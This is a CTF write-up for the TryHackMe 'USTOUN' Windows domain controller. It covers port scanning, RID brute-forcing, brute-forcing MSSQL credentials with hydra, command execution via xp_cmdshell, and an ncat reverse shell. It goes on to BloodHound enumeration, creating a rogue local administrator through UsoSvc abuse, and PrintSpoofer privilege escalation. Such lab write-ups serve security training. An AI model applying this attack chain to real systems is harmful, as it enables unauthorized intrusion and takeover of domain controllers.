CTF-Writeups/TryHackMe/USTOUN.md
2021-04-29 11:21:01 +05:00

9.6 KiB

TryHackMe-USTOUN

Rustscan

PORT      STATE SERVICE            REASON          VERSION                   
53/tcp    open  domain?            syn-ack ttl 127
| fingerprint-strings:                     
|   DNSVersionBindReqTCP:                    
|     version                                           
|_    bind                                              
88/tcp    open  kerberos-sec       syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2021-04-03 18:57:34Z)                                   
135/tcp   open  msrpc              syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn        syn-ack ttl 127 Microsoft Windows netbios-ssn                                                                    
445/tcp   open  microsoft-ds?      syn-ack ttl 127
464/tcp   open  kpasswd5?          syn-ack ttl 127
593/tcp   open  ncacn_http         syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped         syn-ack ttl 127
1433/tcp  open  ms-sql-s?          syn-ack ttl 127
3268/tcp  open  ldap               syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: ustoun.local0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped         syn-ack ttl 127
3389/tcp  open  ssl/ms-wbt-server? syn-ack ttl 127
| rdp-ntlm-info: 
|   Target_Name: DC01
|   NetBIOS_Domain_Name: DC01
|   NetBIOS_Computer_Name: DC
|   DNS_Domain_Name: ustoun.local
|   DNS_Computer_Name: DC.ustoun.local
|   DNS_Tree_Name: ustoun.local
|   Product_Version: 10.0.17763
|_  System_Time: 2021-04-03T19:00:24+00:00
| ssl-cert: Subject: commonName=DC.ustoun.local
| Issuer: commonName=DC.ustoun.local
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-01-31T19:39:34
| Not valid after:  2021-08-02T19:39:34
| MD5:   fce5 375e 0190 ebc1 bf6e f384 468f 69f6
| SHA-1: dbe7 28d6 1980 1221 c9cb 712a 911e 99b2 303e 5de7
| -----BEGIN CERTIFICATE-----
| MIIC4jCCAcqgAwIBAgIQWPJp5aVu8JlPCbMkI/U6AjANBgkqhkiG9w0BAQsFADAa
| MRgwFgYDVQQDEw9EQy51c3RvdW4ubG9jYWwwHhcNMjEwMTMxMTkzOTM0WhcNMjEw
| ODAyMTkzOTM0WjAaMRgwFgYDVQQDEw9EQy51c3RvdW4ubG9jYWwwggEiMA0GCSqG
| SIb3DQEBAQUAA4IBDwAwggEKAoIBAQDErxES6mfg1M0Ur5tZJHE8BKV+voQAWLa4
| gKJfNi0av9nZ80wp2gJnQmHmZC0ACVpQUufMU9vlaCnk35rqsyM0/igqigSqWXAM
| OY/876ZWGbo5R1g3PjH4bE3mdPtPAJF0wfS8aZ8CdHlmuGDFlJmnu6qFEP/PoACC
| tf1S/vky+8GVs4uLFyxZOY5mam5PNULQvsMz2ycOPwj2CYwgWnrnA52N6m/6O9v7
| XK+K6XBSGHamrHR5EYFXG+u1vItwm4qpUZerUhZl2/WVKIIN4pDXWDCrS59nsVvc
| UC3fDPcgzruHIVJcA+g+CsEYdidS+E1NO3e3ZnWBeWE77ZCSDyTNAgMBAAGjJDAi
| MBMGA1UdJQQMMAoGCCsGAQUFBwMBMAsGA1UdDwQEAwIEMDANBgkqhkiG9w0BAQsF
| AAOCAQEAj9XeCOtYI4LrmeM7qZVQYuuDHIDosWkIw0LMpin4/gt0CDaEB1/uXUnX
| JnBUEHWMDdjzC22hTsTdUIntZgJAk81aQbPm3qMvSE1AXPCCfsN7GehA4kX/n42X
| xiz2rwZo/5DYH0JOWj8iCZyFMiXqSwQm3GWbG4LuTOct+x/rv0UwhyCvdllVRtwz
| P9BM/9qZqy3LecKtJh6UUo8FZ8zkekT9nsJ9/vCv3/THRUMOtEtSXdZUUqccXwRm
| 0HVLxT09wdGGbwdOzzdQSQfLmewi3rSZQf9liaXDtpkK60qrzj4zcyGG2QvX+9EI
| pZV0B4rzCUDWrpaTOsv8z7Qlgeb2GA==
|_-----END CERTIFICATE-----
|_ssl-date: 2021-04-03T19:01:07+00:00; +1m25s from scanner time.
5985/tcp  open  http               syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf             syn-ack ttl 127 .NET Message Framing
47001/tcp open  http               syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc              syn-ack ttl 127 Microsoft Windows RPC
49665/tcp open  msrpc              syn-ack ttl 127 Microsoft Windows RPC
49666/tcp open  msrpc              syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open  msrpc              syn-ack ttl 127 Microsoft Windows RPC
49669/tcp open  msrpc              syn-ack ttl 127 Microsoft Windows RPC
49670/tcp open  ncacn_http         syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49673/tcp open  msrpc              syn-ack ttl 127 Microsoft Windows RPC
49689/tcp open  msrpc              syn-ack ttl 127 Microsoft Windows RPC
49709/tcp open  msrpc              syn-ack ttl 127 Microsoft Windows RPC
49712/tcp open  msrpc              syn-ack ttl 127 Microsoft Windows RPC
49726/tcp open  msrpc              syn-ack ttl 127 Microsoft Windows RPC

From the scan we can see a domain name

PORT 445 (SMB)

We can only access $IPC as anonymous but there is no use of it. So using crackmapexec we can use RID bruteforce which will enumerate all AD objects including users and groups by guessing every resource identifier (RID)

Here you can see SVC-Kerb might be a user we can try to bruteforce as MS-SQL is running we can try there

PORT 1433 (MS-SQL)

The database is Microsfoft SQL so let's brute force credentials using hydra

We found the password so we can use metasploit's module for code execution use admin/mssql/mssql_exec

So there's a command execution alternatively we can try do sqsh which is an opensource program for getting a interactive database shell

Here -S indicates the server where we put the IP address or the port if MS-SQL was on a different port

-U specifies the username

-P specifies the passowrd

Now to execute windows commands we are going to use xp_cmdshell which spawns a windows command shell . xp_cmdshell is an extended stored procedure provided by Microsoft and stored in the master database. So the whole command will be EXEC master ..xp_cmdshell'whoami' , here EXEC is used to execute stored procedure on a database and stored procedures are kinda like functions in mysql /mssql.

We can find the user.txt in C:\Users\SVC-Kerb.DC01

But when I tried to read it I get access denied

So first to get a proper shell I uploaded ncat64.exe you can download it from here

https://github.com/int0x33/nc.exe

Now we got a shell at least so to see what permissions does SVC-kerb has we can do net user SVC-kerb

It tells that we are just a domain user also this looks like a service account and we won't be able to with it much since this is a Active Directory we can try to run SharpHoundp.ps1 to gather everything it could find about the domain

I transfered the file onto target machine but before run it let's find the domain name we already know it from the nmap scan but just to be sure spawn a powershell by running powershell and run Get-ADDomain this will show you the information of the domain

Now we will import sharphound.ps1 and use it's functions

We need to transfer this on to our local machine so we can analyze the data through BloodHound

To transfer it I tried creating a smb share on my local machine and copying the zip file there but windows gave an error that it wasn't allowing to transfer the file so I thought of trying to get a meterpter shell through which I can download the zip file

Run neo4j console

Then bloodhound

I imported that zip file in blood hound but didn't find anything intersting, so can now upload PowerUp.ps1 to enumerate for misconfigurations or privilege escalation techniques

PowerUp

You can download the script from here

https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc

Also read the documentation from here

https://www.harmj0y.net/blog/powershell/powerup-a-usage-guide/

Now importing the powershell script and running Invoke-AllChecks

So here we have 2 ways of getting admin first let's try abusing the service UsoSvc

Service Abuse

Looking at the documentation

We can abuse a service by creating a local administartor by creating a new username and then adding it local adminstrators group or by using the current username

Creating a new username and adding it to local adminstrator

To see if this user was added

Now to switch to this user we can evil-winrm to login since winrm service is rinning

SeImpersonatePrivilege

Running whoami /all to see what privleges the user has

Now we can abuse this service by through PrintSpoofer

Download printspoofer 64 bit verison

https://github.com/itm4n/PrintSpoofer/releases/tag/v1.0

And we can access Administrator's directory